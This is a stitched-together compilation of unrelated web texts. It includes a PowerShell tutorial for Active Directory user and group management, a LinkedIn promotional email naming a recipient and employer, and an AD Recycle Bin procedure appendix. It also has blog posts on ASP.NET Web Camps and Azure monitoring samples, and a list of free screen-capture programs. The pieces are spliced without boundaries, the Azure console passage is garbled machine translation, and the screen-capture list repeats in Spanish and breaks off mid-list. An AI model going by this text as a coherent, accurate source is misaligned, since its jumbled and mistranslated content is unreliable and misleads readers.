If you don’t know the user’s account name, you can query the AD database in a more general way to find out if the user exists.

PS C:> Get-ADUser –Filter {Surname –eq “Hess”}

     Figure 5: Querying AD for a user’s surname.

You know that Surname is a good identifier to search on because it is part of the user record as shown in Figure 4 above. You can query AD using any of the identifiers listed. For example, you can use a user’s given name, if you aren’t sure of his or her surname.

PS C:> Get-ADUser –Filter {GivenName –eq “Ken”}

    Figure 6: Querying AD using a user’s given name.

This basic information will help you locate a user, if he or she exists in AD, but it doesn’t tell you anything about the user’s group memberships. For example, if a user is only supposed to be in the Domain Users group, the default for all domain users, but also has group membership in an Administrator group, you might never know until you query for that information.

PS C:> Get-ADPrincipalGroupMembership –Identity khess

    Figure 7: Finding out to which groups a user belongs.

As Figure 7 shows, user khess belongs to Domain Users, Administrators, and Domain Admins.

You find that user khess isn’t authorized to be a member of the Domain Admins group. You can revoke his membership to this group with the Remove-ADGroupMember cmdlet.

PS C:> Remove-ADGroupMember –Identity “Domain Admins” –Member  “khess”

The system prompts you to agree that you want to take this action. Press Enter at the prompt to accept the default answer, which is “Yes.”

To verify that you’ve successfully removed the user from the Domain Admins group, query AD for the user’s principal group membership again.

PS C:> Get-ADPrincipalGroupMembership –Identity khess

Figure 8 shows the results of the two cmdlets.
    Figure 8: Removing a user from the Domain Admins security group.

Working with Users and User Accounts

Creating new user accounts is one of the tasks that junior-level administrators receive as part of their standard duties. PowerShell’s AD cmdlets takes some of the pain out of creating them, although there is no known process for creating user accounts that is 100-percent painless. To create a new user account via PowerShell, you need to know two essential pieces of information: the correct spelling of the user’s name and the account name assigned to the user.

PS C:> New-ADUser –Name “Abby Jones” –GivenName Abby –Surname Jones –UserPrincipalName ajones@mw.local –SamAccountName ajones

The cmdlet returns no information to you. Use the Get-ADUser cmdlet to confirm the account’s creation. See Figure 9 for details.

PS C:> Get-ADUser ajones

    Figure 9: Creating a new user account.

Note that all AD accounts created via PowerShell are disabled by default unless you supply a password when you create the account. You will have to give the account a password and enable the account before the user can log on the first time. It’s easier to enable the account and supply a password at account creation, but some company policies require that new accounts remain disabled until the user has been assigned a computer.

One method of creating an enabled, password protected user account is to allow the script to ask you for a password, using the prompt supplied in the cmdlet (Password), as shown.

PS C:> New-ADUser –Name “Abby Jones” –GivenName Abby –Surname Jones –UserPrincipalName ajones@mw.local –SamAccountName ajones –Enabled 1 –AccountPassword (Read-Host –AsSecureString “Password”)

Password: *********

To see a list of disabled accounts in the domain, use the Search-ADAccount cmdlet. See Figure 10.

PS C:> Search-ADAccount –AccountDisabled –UserOnly |FT Name

    Figure 10: Listing the domain’s disabled accounts.

If you don’t specify “Enabled” and a password when you create the account, you’ll have to supply an initial password and enable the account as a two-step process.

First, change the user’s password from no password to the new password. Both passwords are read from keyboard input for security reasons. Since the user doesn’t have an old password, press ENTER when prompted for it.

PS C:> Set-ADAccountPassword –Identity ajones –NewPassword (Read-Host –AsSecureString “New Password”) –OldPassword (Read-Host –AsSecureString “Old Password”)

New Password: ********
Old Password:

There’s no response from the system.

Enable the disabled account using the Enable-ADAccount cmdlet.

PS C:> Enable-ADAccount –Identity ajones

You’re returned to the PowerShell prompt with no response. You can confirm that you successfully enabled the account.

PS C:> Search-ADAccount –AccountDisabled –UserOnly |FT Name

The user’s name no longer appears in the list of disabled accounts.

As a System Administrator, you know that users sometimes lock themselves out of the domain by typing in a password incorrectly enough times that they exceed the maximum number of attempts and lockout occurs. Unlocking user accounts doesn’t have to be a stressful experience for you or the user, who’s locked himself or herself out of the domain. To unlock the user’s account, you need to have the user’s logon name, for example, khess.

You should first check to confirm that the user’s account is locked out.

PS C:> Search-ADAccount –LockedOut –UsersOnly |FT Name

Ken Hess

You find that the account is locked out. To unlock the account, issue the following cmdlet:

PS C:> Unlock-ADAccount –Identity khess

The account is now unlocked and the user may logon.

To make the cmdlet interactive and useful to perform repeated unlocks, use the following cmdlet and save it as Unlock-Account.ps1.

PS C:> Unlock-ADAccount –Identity (Read-Host “Username”)

You can run the script in PowerShell and it will prompt you for the user’s name and unlock the account.

Removing a user account is so easy to do that you should first disable the account. Disabling an account will render it useless unless another Administrator unlocks it, but it gives you time to verify that the user account should be removed from AD.

To disable a user account, use

PS C:> Disable-ADAccount –Identity ajones

The system returns you to the PowerShell prompt with no response.

When you’re sure that the user account is ready for removal, use the Remove-ADUser cmdlet and answer the confirmation prompt.

PS C:> Remove-ADUser ajones

    Figure 11: Removing a user account from Active Directory.

Working with Remote Domains

Near the beginning of this article, I told you that connecting to domains outside of your home domain can be done but it’s a bit clumsy. It is clumsy, but it can be done. The one thing that you have to remember is that you have to supply credentials for the remote domain for each cmdlet that you issue against it, otherwise your cmdlets operate on your home domain or will fail because you’re referencing resources unknown to your home domain.

For the purposes of this part of the article, MW.LOCAL is the remote, non-trusted domain. It is not my home domain and therefore I have to issue credentials for each command. For example, to look at the domain’s general information, use:

PS C:> Get-ADDomain “MW.LOCAL” –Server “SERVER1” –Credential “MW.LOCALAdministrator”

When you enter this cmdlet, you’ll receive a domain password prompt for the Administrator account as shown in Figure 12.
    Figure 12: Entering the Administrator password for the MW.LOCAL domain.

Once your credentials are accepted, the cmdlet executes against the remote domain and you receive your response as expected. See Figure 13.    Figure 13: Displaying Get-Domain results from a remote domain.

If you recall the simple, Get-ADUser khess cmdlet, the response displays information about the user’s account in the domain as shown in Figure 4.

The same cmdlet to query a remote domain requires a bit more information.

PS C:> Get-ADUser khess –Server “SERVER1” –Credential “MW.LOCALAdministrator”

Executing this cmdlet opens a password prompt for the MW.LOCAL domain. After authentication, you receive the response. See Figure 15.
    Figure 14: Displaying Get-ADUser results from a remote domain.
Note that PowerShell doesn’t cache your credentials. You’ll have to enter them each time you execute cmdlets against a remote domain in which you have authority.

There are other interesting cmdlets in the Active Directory module, such as those that: add computer service accounts, create new organization units, set password expiration, and move objects from one container to another or to a new domain.

In this brief introduction to PowerShell’s Active Directory module, you’ve learned to work with user accounts, to gather information about the domain, to examine user properties, to check group membership, to enter information into interactive cmdlets, and to connect to remote domains. The Active Directory PowerShell module offers System Administrators new opportunities for automating repetitive tasks and for streamlining domain activities.

Best practices for monitoring Microsoft Lync performance

We all know about the complexity of Microsoft Lync which is dependent on multiple infrastructure components, including the network. This can make it extremely difficult and time-consuming to find and resolve performance and availability issues.

When Lync services falter or fail, users experience a reduced ability to communicate, collaborate and work productively, making it imperative that IT resolve Lync issues quickly.

We have found that an application performance monitoring (APM) solution that provides visibility into all an application’s components and dependencies can quickly overcome this impasse. Targeted, real-time monitoring immediately sends administrators down the correct diagnostic path to the root cause.

This white paper from Ipswitch discusses problems with Lync performance and availability, and illustrates specifically how a superior application performance monitoring solution integrates with network management tools to give IT the visibility it needs to rapidly resolve Lync issues.

An APM solution can help ensure maximum performance and availability for all Lync services by enabling IT to:

· Monitor all Lync’s key components, including the front end server, mediation server and edge server

· Monitor the performance of both Lync and heterogeneous networks from a single, unified console

· Automate common repairs and other tasks with PowerShell scripting

· Conveniently generate built-in reports to plan improvements, justify investments and keep the business informed

· Easily tailor out-of-the-box profiles for deployment specific Lync components and dependencies

Register now and download this brand new white paper from Ipswitch and find out how an APM solution can streamline the resolution of problems with Lync performance and availability.

Download Here:

Microsoft Exchange
Announcement in Microsoft Exchange
Best practices for monitoring Microsoft Lync performance
We all know about the complexity of Microsoft Lync which is dependent on multiple infrastructure components, including the network. This can make it extremely difficult and time-consuming to find and resolve performance and availability issues.

When Lync services falter or fail, users experience a reduced ability to communicate, collaborate and work productively, making it imperative that IT resolve Lync issues quickly.

We have found that an application performance monitoring (APM) solution that provides visibility into all an application’s components and dependencies can quickly overcome this impasse. Targeted, real-time monitoring immediately sends administrators down the correct diagnostic path to the root cause.

This white paper from Ipswitch discusses problems with Lync performance and availability, and illustrates specifically how a superior application performance monitoring solution integrates with network management tools to give IT the visibility it needs to rapidly resolve Lync issues.

An APM solution can help ensure maximum performance and availability for all Lync services by enabling IT to:

· Monitor all Lync’s key components, including the front end server, mediation server and edge server

· Monitor the performance of both Lync and heterogeneous networks from a single, unified console

· Automate common repairs and other tasks with PowerShell scripting

· Conveniently generate built-in reports to plan improvements, justify investments and keep the business informed

· Easily tailor out-of-the-box profiles for deployment specific Lync components and dependencies

Download Here:

Respond Now
Don’t want to hear from the manager? Unsubscribe here
This email was intended for Pablo Norberto Villaronga, ITIL (Active Directory Administrator – IAM Enterprise Directories at Ernst & Young). Learn why we included this.
If you need assistance or have questions, please contact LinkedIn Customer Service.
© 2014 LinkedIn Ireland, Gardner House, Wilton Plaza, Wilton Place, Dublin 2, Ireland

Appendix A: Additional Active Directory Recycle Bin Tasks

Appendix A: Additional Active Directory Recycle Bin Tasks

6 out of 7 rated this helpful Rate this topic

Updated: February 20, 2012
Applies To: Windows Server 2008 R2

In addition to recovering a single deleted Active Directory object, there are several additional tasks that you can perform with Active Directory Recycle Bin in Windows Server 2008 R2:

Depending on your system environment and business practices, you can increase or decrease the deleted object lifetime and the tombstone lifetime. If you want your deleted objects to be recoverable for longer than the default 180 days, you can increase the deleted object lifetime. If you want your recycled objects to be recoverable (through authoritative restore) for longer than the default 180 days, you can also increase the tombstone lifetime.

The tombstone lifetime is determined by the value of the tombstoneLifetime attribute. The deleted object lifetime is determined by the value of the msDS-deletedObjectLifetime attribute. By default, tombstoneLifetime is set to null. When tombstoneLifetime is set to null, the tombstone lifetime defaults to 60 days (hard-coded in the system). By default, msDS-deletedObjectLifetime is also set to null. When msDS-deletedObjectLifetime is set to null, the deleted object lifetime is set to the value of the tombstone lifetime.

If the tombstoneLifetime value is empty, the tombstone lifetime is 60 days. If the value is not empty, the tombstone lifetime is the value specified. If the value is less than 3 days, the tombstone lifetime is 3 days.

You can modify the values of the tombstoneLifetime and msDS-deletedObjectLifetime attributes anytime by using the Set-ADObject cmdlet in the Active Directory module for Windows PowerShell (the recommended method) or by using the Ldp.exe administrative tool.
Membership in Enterprise Admins, or equivalent, is the minimum required to complete these procedures. Review details about using the appropriate accounts and group memberships at Local and Domain Default Groups (

  1. Click Start, click Administrative Tools, right-click Active Directory Module for Windows PowerShell, and then click Run as administrator.
  2. At the Active Directory module for Windows PowerShell command prompt, type the following command, and then press ENTER:
    Set-ADObject -Identity “CN=Directory Service,CN=Windows NT,CN=Services,CN=Configuration,DC=,DC=” –Partition “CN=Configuration,DC=,DC=” –Replace:@{“tombstoneLifetime” = }
    Replace DC=,DC= with the appropriate forest root domain name of your Active Directory environment, and replace with the new value for the tombstone lifetime.
    For example, to set tombstoneLifetime to 365 days, run the following command:
    Set-ADObject -Identity “CN=Directory Service,CN=Windows NT,CN=Services,CN=Configuration,DC=contoso,DC=com” –Partition “CN=Configuration,DC=contoso,DC=com” –Replace:@{“tombstoneLifetime” = 365}

For more information about the Set-ADObject cmdlet, at the Active Directory module for Windows PowerShell command prompt, type Get-Help Set-AdObject, and then press ENTER.

  1. To open Ldp.exe, click Start, click Run, and then type ldp.exe.
  2. To connect and bind to the server that hosts the forest root domain of your Active Directory environment, under Connections, click Connect, and then click Bind.
  3. In the console tree, right-click the CN=Directory Service,CN=Windows NT,CN=Services,CN=Configuration container, and then click Modify.
  4. In the Modify dialog box, in Edit Entry Attribute, type tombstoneLifetime.
  5. In the Modify dialog box, in Values, type the number of days that you want to set for the tombstone lifetime value. (The minimum is 3 days.)
  6. In the Modify dialog box, under Operation click Replace, click Enter, and then click Run.

  1. Click Start, click Administrative Tools, right-click Active Directory Module for Windows PowerShell, and then click Run as administrator.
  2. At the Active Directory module for Windows PowerShell command prompt, type the following command, and then press ENTER:
    Set-ADObject -Identity “CN=Directory Service,CN=Windows NT,CN=Services,CN=Configuration,DC=,DC=” –Partition “CN=Configuration,DC=,DC=” –Replace:@{“msDS-DeletedObjectLifetime” = }
    Replace DC=,DC= with the appropriate forest root domain name of your Active Directory environment, and replace with the new value of the deleted object lifetime.
    For example, to set the deleted object lifetime to 365 days, run the following command:
    Set-ADObject -Identity “CN=Directory Service,CN=Windows NT,CN=Services,CN=Configuration,DC=contoso,DC=com” –Partition “CN=Configuration,DC=contoso,DC=com” –Replace:@{“msDS-DeletedObjectLifetime” = 365}

For more information about the Set-ADObject cmdlet, at the Active Directory module for Windows PowerShell command prompt, type Get-Help Set-AdObject, and then press ENTER.

  1. To open Ldp.exe, click Start, click Run, and then type ldp.exe.
  2. To connect and bind to the server hosting the forest root domain of your Active Directory environment, under Connections, click Connect, and then click Bind.
  3. In the console tree, right-click the CN=Directory Service,CN=Windows NT,CN=Services,CN=Configuration container, and then click Modify.
  4. In the Modify dialog box, in Edit Entry Attribute, type msDS-DeletedObjectLifeTime.
  5. In the Modify dialog box, in Values, type the number of days that you want to set for the tombstone lifetime value. (The minimum is 3 days.)
  6. In the Modify dialog box, under Operation click Replace, click Enter, and then click Run.

In addition to using the Active Directory Recycle Bin themselves, administrators can delegate the following operations to selected users:

  • Deleting an Active Directory object
  • Viewing a deleted Active Directory object
  • Viewing a deleted Active Directory object’s deactivated links
  • Viewing tombstone Active Directory objects
  • Recovering a deleted Active Directory object
  • Manually recycling a deleted Active Directory object
  • Managing optional Active Directory Recycle Bin features

The following table outlines the access control mechanisms (ACMs) and the default permission levels that are required for each task that an administrator can delegate.


Task Access control mechanism Default permission level
Deleting objects Delete ACMs Domain Administrators
Viewing deleted objects Read ACMs and showDeletedObjects Lightweight Directory Access Protocol (LDAP) control and List Content and Read Property rights on the Deleted Objects container

You might need to take ownership of the Deleted Objects container in order to grant these permissions. For example, to take ownership of the Deleted Objects container using dsacls.exe, type: dsacls "CN=Deleted Objects,DC=Contoso,DC=com" /takeownership To grant List Content and Read Property rights on the Deleted Objects container, type:dsacls "CN=Deleted Objects,DC=Contoso,DC=com" /G CONTOSOEricLang:LCRP For more information, see View or Set Permissions on a Directory Object.

Domain Users
Viewing deactivated links Read ACMs and showDeactivatedLinks LDAP control Domain Users
Viewing tombstones Read ACMs and showTombstoneObjects LDAP control Domain Users
Recovering deleted objects Write ACMs (on the object) and reanimate-tombstone control access right (CAR) (on the naming context (NC)) Domain Administrators
Recycling deleted objects Write ACMs (on the object) and reanimate-tombstone CAR (on the NC) Domain Administrators
Managing optional features Manage-optional-features CAR (on the target object) Domain Administrators

For more information about how to delegate rights in an Active Directory environment, see the following:

All deleted Active Directory objects are recycled automatically when their deleted object lifetimes expire. In addition, administrators can recycle deleted Active Directory objects manually.
Membership in Domain Admins, or equivalent, is the minimum required to complete this procedure. Review details about using the appropriate accounts and group memberships at Local and Domain Default Groups (

  1. To open Ldp.exe, click Start, click Run, and then type ldp.exe.
  2. To connect and bind to the server that hosts the forest root domain of your AD DS environment, under Connections, click Connect, and then click Bind.
  3. In the console tree, navigate to the CN=Deleted Objects container.
  4. Right-click the deleted Active Directory object that you want to recycle, and then click Delete.
  5. In the Delete dialog box, make sure that the Extended check box is checked, and then click OK.
  6. To verify that the deleted Active Directory object is now recycled:
    1. In the Controls dialog box, on the Load Predefined menu, click Return recycled objects, and then click OK.
    2. In the console tree, navigate to the CN=Deleted Objects container, and then double-click the deleted Active Directory object that you recycled.
    3. In the details pane, verify that the isRecycled attribute on this object is set to TRUE.

In Windows Server 2008 R2, as in Windows Server 2008, you can use the Active Directory Domain Services (AD DS) auditing mechanism with the Directory Service Changes audit policy to log old and new values when changes are made to Active Directory objects and their attributes. We recommend that you implement auditing in your Active Directory environment to track all object deletions, object deletion times, and the account names that perform these object deletions. For more information, see the AD DS Auditing Step-by-Step Guide (

Web Camps tour

Dallas isn’t the only stop for the Web Camps tour. Our other good buddy, Jon Galloway, has worked hard creating this year’s Web Camps content, and has been out on the road promoting all the awesome new stuff we’ve released with the ASP.NET framework and tools. Along with Mr. Hunter, I’ll be presenting demonstrations and content related to all of the awesome topics below:

  • Keynote: The ASP.NET Web Platform in Context
  • What’s new in ASP.NET 4.5 and Visual Studio 2012
  • Building and deploying websites with ASP.NET MVC 4
  • Creating HTML5 Applications with jQuery
  • Building a service layer with ASP.NET Web API
  • Leveraging your ASP.NET development skills to build apps for Office
  • Building and leveraging social web apps in ASP.NET
  • Building for the mobile web
  • Real-time communications with SignalR
  • Leveraging Windows Azure and Windows Azure Web Sites

So if you’re an ASP.NET developer, or you’ve been thinking about learning more about the new stuff available in the ASP.NET stack, come on out and join Scott Hunter and I on Friday, April 5 in Dallas, TX. We’ve got a whole series of these events lined up lots of other places, so check out the other areas where we’ll be heading and join us at one of those great events, too. 

Jon, myself, and the rest of the team welcome you to this great series of events. We hope to see you there!


The next Windows Azure code sample released by the Windows Azure Evangelism Team is the CloudMonitR sample. This code sample demonstrates how Windows Azure Cloud Services can be instrumented and their performance analyzed in real time using a SignalR Hub residing in a web site hosted with Windows Azure Web Sites. Using Twitter Bootstrap and Highcharts JavaScript charting components, the web site provides a real-time view of performance counter data and trace output. This blog post will introduce the CloudMonitR sample and give you some links to obtain it.


Last week I had the pleasure of travelling to Stockholm, Sweden to speak at a great community-run conference, CloudBurst 2012 (as well as a few other events, which will be covered in a future post very very soon). I decided to release a new Windows Azure code sample at the conference, and to use the opportunity to walk through the architecture and implementation of the sample with the participants. As promised during that event, this is the blog post discussing the CloudMonitR sample, which you can obtain either as a ZIP file download from the MSDN Code Gallery or directly from its repository.
Below, you’ll see a screen shot of CloudMonitR in action, charting and tracing away on a running Windows Azure Worker Role.
The architecture of the CloudMonitR sample is similar to a previous sample I recently blogged about, the SiteMonitR sample. Both samples demonstrate how SignalR can be used to connect Windows Azure Cloud Services to web sites (and back again), and both sites use Twitter Bootstrap on the client to make the GUI simple to develop and customizable via CSS.
The point of CloudMonitR, however, is to allow for simplistic performance analysis of single- or multiple-instance Cloud Services. The slide below is from the CloudBurst presentation deck, and shows a very high-level overview of the architecture.
As each instance of the Worker (or Web) Role you wish to analyze comes online, it makes an outbound connection to the SignalR Hub running in a Windows Azure Web Site. Roles communicate with the Hub to send up tracing information and performance counter data to be charted using the Highcharts JavaScript API. Likewise, user interaction initiated on the Windows Azure Web Sites-hosted dashboard to do things like add additional performance counters to observe (or to delete ones no longer needed on the dashboard) is communicated back to SignalR Hub. Performance counters selected for observation are stored in a Windows Azure Table Storage table, and retrieved as the dashboard is loaded into a browser.

Available via NuGet, Too!

The CloudMonitR solution is also available as a pair of NuGet packages. The first of these packages, the simply-named CloudMonitR package, is the one you’d want to pull down to reference from a Web or Worker Role for which you need the metrics and trace reporting functionality. Referencing this package will give you everything you need to start reporting the performance counter and tracing data from within your Roles.
The CloudMonitR.Web package, on the other hand, won’t bring down a ton of binaries, but will instead provide you with the CSS, HTML, JavaScript, and a few image files required to run the CloudMonitR dashboard in any ASP.NET web site.


The newest sample from the Windows Azure Evangelism Team (WAET) is a real-time, browser-based web site monitor. The SiteMonitR front-end is blocked out and styled using Twitter Bootstrap, and Knockout.js was used to provide MVVM functionality. A cloud service pings sites on an interval (10 seconds by default, configurable in the worker’s settings) and notifies the web client of the sites’ up-or-down statuses via server-side SignalR conversations. Those conversations are then bubbled up to the browser using client-side SignalR conversations. The client also fires off SignalR calls to the cloud service to manage the storage functionality for the URL’s to be monitored. If you’ve been looking for a practical way to use SignalR with Windows Azure, this sample could shed some light on what’s possible.
Architectural Overview
The diagram below walks through the various method calls exposed by the SiteMonitR SignalR Hub. This Hub is accessed by both the HTML5 client application and by the Cloud Service’s Worker Role code. Since SignalR supports both JavaScript and Native .NET client connectivity (as well as a series of other platforms and operating systems), both ends of the application can communicate with one another in an asynchronous fashion.
SiteMonitR Architectural Diagram
Each tier makes a simple request, then some work happens. Once the work is complete, the caller can call events that are handled by the opposite end of the communication. As the Cloud Service observes sites go up and down, it sends a message to the web site via the Hub indicating the site’s status. The moment the messages are received, the Hub turns around and fires events that are handled on the HTML5 layer via the SignalR jQuery plug-in. Given the new signatures and additional methods added in SignalR 0.5.3, the functionality is not only identical in how it behaves, the syntax to make it happen in both native .NET code and JavaScript are almost identical, as well. The result is a simple GUI offering a real-time view into any number of web sites’ statuses all right within a web browser. Since the GUI is written using Twitter Bootstrap and HTML5 conventions, it degrades gracefully, performing great on mobile devices.
Where You Can Get SiteMonitR
As with all the other samples released by the WAET, the SiteMonitR source code is available for download on the MSDN Code Gallery site. You can view or clone the source code in the repository we set up for the SiteMonitR source. Should you find any changes or improvements you’d like to see, feel free to submit a pull request, too. Finally, if you find anything wrong with the sample submit an issue via GitHub’s issue tab, and we’ll do what we can to fix the issues reported. The repository contains a Getting Started document that walks you through the whole process – with screen shots – of setting up the SiteMonitR live in your very own Windows Azure subscription (if you don’t have one, get a free 90-day trial here).
Demonstration Video
Finally, the video below walks you through the process of downloading, configuring, and deploying the SiteMonitR to Windows Azure. In less than 10 minutes you’ll see the entire process, have your very own web site monitoring solution running in the cloud, and you’ll be confident you’ll be the first to know when any of your sites crash since you’ll see their statuses change in real-time. If the video doesn’t load properly for you, feel free to head on over to the Channel 9 post containing the video.

A few days after the SiteMonitR sample was released, Matias Wolowski added in some awesome functionality. Specifically, he added in the ability for users to add PhantomJS scripts that can be executed dynamically when sites statuses are received. Check out his fork of the SiteMonitR repository on I’ll be reviewing the code changes over the next few days to determine if the changes are low-impact enough that they can be pulled into the main repository, but the changes Matias made are awesome and demonstrate how any of the Windows Azure Evangelism Team’s samples can be extended by the community.


New Console Microsoft Windows Azure

Knowing the new console Microsoft Windows Azure services platform Cloud services has had a number of important changes in recent months have inserted new features also have been potentiated services redundancy, replication scenarios IaaS, PaaS.

New console has TAP for new features that are being inserted to the market.

This catch can observe groups have changed availability, the time set, the slideshow design allows a panoramic view of the configuration components of Windows Azure

Improve significant that have been included in Windows Azure.

machines. Support for extensions Chef and puppets, level base prices to calculate the instances the network: General availability of Gateways VPN DynamicRouting and Point-to-Site VPN mobile support preview Visual Studio. net, integration with Active Directory Azure and support Offline;

• Notification hubs: Support for Kindle Fire and integration of server explorer Visual Studio

Auto-estalación: general availability release storage: launch of the general availability of read access Geo redundant storage
programming: version availability General

Automation hear the launch of the new Azure service automation

18 Free software to capture video screen

18 Free software to capture video screen

More than 18 free programs to create screencasts catching or videotaping what we do on the screen of your desktop.

It is possible that for reasons as diverse as creating a video tutorial on youtube or capture a game of a game, we need to videotape the actions we take in our computer screen, even with our voice of support, or by adding the activity of our webcam .

Here I present a list of more than 18 free programs to create screencasts, or what is the same, video capture what we do on the screen of your desktop.

1. Hypercam 2

One of my favorite shows to capture video under Windows is Hypercam. It’s simple and easy, allows you to select regions or windows, setting the fps (frames per second), select a video codec installed (xvid, divx …) to save space in the video or highlight in different ways interaction mouse cursor.

Hypercam 3 (of Solveig Multimedia) costs 29.95 euros, while Hypercam 2 (of Hyperionics) has become completely free and can be downloaded from its website both in version for 32 bits and 64 bits.

URL | Hypercam 2 ~ 1MB

2. Expression Encoder 4

Microsoft has a very interesting software to edit video called Expression Encoder 4. There are several paid versions, much more complete as Studio Web Pro ($ 149), Expression Encoder 4 Pro ($ 199) and Studio Ultimate ($ 599).

However, Expression Encoder 4 is free and editing tasks can be performed as well as capture screen activity codec Expression Encoder Screen Capture, capturing your desktop, and even streaming webcam with high quality results.

URL | Expression Encoder 4 ~ 28MB

3. Camstudio

Camstudio is an open source software to capture video screens. Like most of these programs, selects a specific region Video options (codecs), audio (choose micro or sound system) and even make notes on the screen or automatically add a watermark.

It also incorporates a lossless video codec (lossless), ideal for capturing videos in which there are not many textures and colors abound “flat”. More information enFormatos Image: Optimization Guide.

URL | CamStudio ~ 4MB

4. BBFlashBack Express

BBFlashBack is another capture software, which also has a small editor to manage your recording. There are several versions of this software, BBFlashBack Pro ($ 199) yBBFlashBack Standard ($ 89), however, BBFlashBack Express is free, and you just have to register to use it.

BBFlashBack Express can save captures video (AVI) or flash format (SWF), including sound or webcam, or assistant to upload directly to Youtube, ideal for online tutorials.

URL | BBFlashBack Express ~ 12MB

5. Ezvid

There are many programs for creating screencast, but if your goal is to create videos to youtube without complications, there is one really appropriate: Ezvid.

With a clean and accessible interface, you can capture your screen activity, record audio from micro, synthesize speech, allowing also edit the result, add images, videos or secondary texts and include background music (from a specific list without copyright).

Of course, it should be noted that this is a very simple application (and possibly very limited for advanced users) that allows recording up to 10 minutes. In fact, only permitesubir video to youtube directly, without possibility of exporting to a file.

URL | Ezvid ~ 1MB

If you are interested in more similar systems, but very simple via web, you can try Screenr oScreencast-o-matic, both free and payment versions with different features.

6. Freeseer

Freeseer is an open source project in Python / Qt4-oriented recording screencasts in Linux and Windows platforms (Mac not yet available). It allows the recording of a specific region of screen, make the recording software or hardware, set different resolutions or even perform streaming.

URL | Freeseer ~ 1MB

7. Istanbul

This simple but powerful program allows you to select a window (or area) of a Linux desktop, and perform video recording of the activity occurring in the region. Allows some basic options such as 3D recording activity, hide the mouse pointer or record sound.

The target format is Ogg Theora video (VGO), free free video codec patents. It works on desktop environments like KDE, Gnome, XFCE, or others.

URL | Istanbul

8. Jing

Jing is free software, developed by the creators of the popular Camtasia (payment, 282 euros) and the not so known SnagIt (47.95 euros). While it is not as complete as his older brothers, it serves perfectly for its task.

Saves the activity of your screen and export it to a Flash file (SWF). Videos most, allow for 5 minutes and require free registration

URL | Jing ~ 7MB

9. Wink

Another free software for creating presentations is Wink. It works on both Windows and Linux platforms, and allows you to capture with editing capability.

Output formats are somewhat different, since it is oriented desktop presentations and restricts exports in flash format (SWF), auto-executable (EXE), documents (PDF or PS) or images in HTML files.

URL | Wink ~ 3MB

10. RecordMyDesktop

For advanced Linux users, who are accustomed to using text terminals, we RecordMyDesktop, a software that allow you to capture the screen of your desktop (or screen region) directly from a command with their parameters, useful for creating us our own custom scripts.

The generated video format is Ogg Theora video (VGO).

URL | recordMyDesktop

If you do not like this app, you can try other similar programs like glc, considered the Fraps (29.95 euros) for Linux, or byzanz, much like recordMyDesktop but allows other formats like GIF or FLV.

11. Capture Fox

There is a plugin for the Mozilla Firefox browser that allows you to capture screen video format, called Capture Fox.

It’s completely free, but unfortunately, at the time of writing, it is not compatible with the latest current version of Firefox (16.0.1), so can only be used from a previous version.

URL | Capture Fox

12. ActivePresenter Free Edition

ActivePresenter Free Edition is a great video recording software for capturing screen activity and edit, and export it to various video formats, among which are WMV, AVI, MPEG4 and WebM.

There are 3 different versions, among which are included ActivePresenter Standard ($ 349.95), ActivePresenter Professional ($ 449.95) and ActivePresenter Free Edition (free), which has no time limit on the recording or place any mark water ad.

URL | ActivePresenter

13. Cropper

Cropper is a little out of the scope of this program list, since it is oriented to capture still images of your screen software.

However, I wanted to include the ability to create animated GIF, using the plug-in AnimatedGif, which will perform certain catches of small processes or activities to “smooth” colors optimally and taking up little space.

The plugin also allows you to create screenshots and automatically send them to sites like Facebook, Flickr, Imgur, Twitter or others.

URL | Cropper

14. Taksi

Taksi aims to be an open source alternative to the famous Fraps, allowing video recording of your desktop or 3D games. It allows the recording of DirectX 8 and 9, OpenGL and even GDI.

NOTE: Although the official website mentions that the audio capture is not functional (in v0.7.6), in the current version (v0.7.7.9-dev) is working properly.

URL | Taksi

15. Ultra Screen Recorder

Ultra Screen Recorder part of a very clever idea. This is a plugin for the softwareUltraVNC, a variant of VNC remote administration program.

The idea is that, like most applications of image recording, resource-intensive and can not be performed with a high rate of fps (frames per second), a program of remote administration is used to capture the video screen activity .

Yes, it is advisable to only be used by advanced users, as expertise networks and remote management are needed.

URL | UVNC Screen Recorder

16. Krut

Krut is an open source software platform (based on Java) that allows you to capture video (and screen) in separate files rather high customization. Recordings are made in Quicktime (MOV) format and sound in WAV format, separately.

URL | Krut

17. XFire

XFire is a messaging program for Windows, which allows integrated into our games and allow capture video and pictures and even streaming. You can register and download it from the website of XFire.

URL | XFire

18. A method for advanced users

There are several applications that can also take screenshots in Videocon more specific parameters and performance probably much higher. However, it is only recommended for advanced users, since these methods are much more complex and less intuitive.


With the famous open source editor VirtualDub can capture video, as it has an option (Capture AVI) which can recover the activity of our desktop or webcam video format. Some guidelines:

How to record games in HD FREE (better than FRAPS)
Real-time screen capturing With VirtualDub / VHScrCap
VideoLAN (VLC)

VLC is a great video player, which allows many possibilities outside the (most common) video playback, including dumps network, streaming or capture video screen activity. A guide below:

How to use VLC as a free open source alternative to Playon TV

FFmpeg is a very powerful system to record, capture or transform videos and formats, with which you can perform almost any video operation. Here is a guide with FFMpeg:

Stream your desktop windows using FFMpeg
also mention the existence of Screen Capture Recorder, a project on GitHub, which helps video recording under Windows.

EXTRA: ocam

An incredible program to capture fragments of the screen, simple, very comfortable and with a pleasant and simple. It supports codecs such as XviD, x264vfw or VP8, which can be downloaded from codecs to ocam.


Hypercam 3 (de SolveIG Multimedia) cuesta 29,95 euros, mientras que Hypercam 2 (de Hyperionics) ha pasado a ser totalmente gratuita y puede ser descargada desde su página tanto en versión para sistemas de 32 bits como de 64 bits.

URL | Hypercam 2 ~1MB

2. Expression encoder 4

Microsoft tiene un software para editar vídeo muy interesante llamado Expression Encoder 4. Existen varias versiones de pago, mucho más completas como Studio Web Pro (149 dólares),Expression Encoder 4 Pro (199 dólares) y Studio Ultimate (599 dólares).

Sin embargo, Expression Encoder 4 es gratuito y pueden realizarse tareas de edición, así como capturar actividad en pantalla con el codec Expression Encoder Screen Capture, capturando nuestro escritorio, webcam e incluso streaming con resultados de muy alta calidad.

URL | Expression Encoder 4 ~28MB

3. Camstudio

Camstudio es un software open source para capturar pantallas en vídeo. Como la mayoría de estos programas, permite seleccionar una región concreta, opciones de vídeo (codecs), audio (elegir micro o sonido del sistema) e incluso hacer anotaciones en pantalla o añadir una marca de agua automáticamente.

Además, incorpora un codec de video lossless (algoritmo sin pérdidas), ideal para capturar vídeos en los que no hay demasiadas texturas y abundan los colores “planos”. Más información enFormatos de imagen: Guía de optimización.

URL | CamStudio ~4MB

4. BBFlashBack Express

